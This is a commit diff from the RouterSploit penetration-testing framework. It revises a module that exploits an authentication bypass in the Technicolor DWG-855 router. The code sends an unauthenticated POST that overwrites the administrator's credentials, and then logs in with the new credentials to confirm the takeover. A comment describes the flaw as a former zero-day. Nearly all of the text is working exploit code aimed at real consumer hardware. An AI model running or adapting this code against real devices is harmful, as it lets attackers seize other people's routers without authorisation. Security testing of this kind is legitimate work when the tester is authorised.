Merge remote-tracking branch 'reverse-shell/master'

a7b23768 · BigNerd95 · b9c3b236 · efa04dd3 · a7b23768
Commit a7b23768 authored Feb 20, 2017 by BigNerd95
Hide whitespace changes
Inline Side-by-side

Showing with 16 additions and 16 deletions

dwg855_authbypass.py ...rsploit/modules/exploits/technicolor/dwg855_authbypass.py +16 -16

No files found.
--- a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
+++ b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
@@ -19,11 +19,11 @@ class Exploit(exploits.Exploit):
        'name': 'Technicolor DWG-855 Auth Bypass',
        'description': 'Module exploits Technicolor DWG-855 Authentication Bypass vulnerability which allows changing administrator\'s password.\n\nNOTE: This module will errase previous credentials, this is NOT stealthy.',
        'authors': [
-            'JPaulMora <https://JPaulMora.GitHub.io>',  # vulnerability discovery, routersploit module
+            'JPaulMora <https://JPaulMora.GitHub.io>',  # vulnerability discovery, initial routersploit module.
            '0BuRner',  # routersploit module
        ],
        'references': [
-            'No references, at time of write its a 0day. Check my page though I probably wrote something about it.',
+            'Bug discovered some time before Aug 2016, this is the first reference to it!\n   This exploit works with any POST parameter, but changing admin creds gives you access to everything else.',
        ],
        'devices': [
            'Technicolor DWG-855',
@@ -49,28 +49,28 @@ class Exploit(exploits.Exploit):
            response = http_request(method="POST", url=url, headers=headers, data=data)

            if response is None:
-                print_error("Target did not answer request")
+                print_error("Target did not answer request.")
            elif response.status_code == 401:
-                print_error("Target answered, denied access.")
+                # Server obeys request but then sends unauthorized response. Here we send a GET request with the new creds.
+                infotab_url = sanitize_url("{}:{}/RgSwInfo.asp".format(self.target, self.port))
+                check_response = http_request(method="GET", url=infotab_url, auth=(self.nuser, self.npass))
+
+                if check_response.status_code == 200:
+                    print_success("Credentials changed!")
+                elif response.status_code == 401:
+                    print_error("Target answered, denied access.")
+                else:
+                    pass
            else:
-                print_success("Credentials changed")
+                print_error("Unknown error.")
        else:
            print_error("Exploit failed - Target seems to be not vulnerable")

    @mute
    def check(self):
        url = sanitize_url("{}:{}/logo.jpg".format(self.target, self.port))
-        user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
-        headers = {'User-Agent': user_agent,
-                   'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
-                   'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
-                   'Connection': 'keep-alive',
-                   'Accept-Encoding': 'gzip, deflate',
-                   'Authorization': 'Og==',  # this is base64(":")
-                   'Cache-Control': 'no-cache'}
-
-        response = http_request(method="GET", url=url, headers=headers)
-
+        response = http_request(method="GET", url=url, auth=("", ""))
+        # print response.text.encode('utf-8')
        if response is not None and self.vulnresp in response.text.encode('utf-8'):
            return True
        else: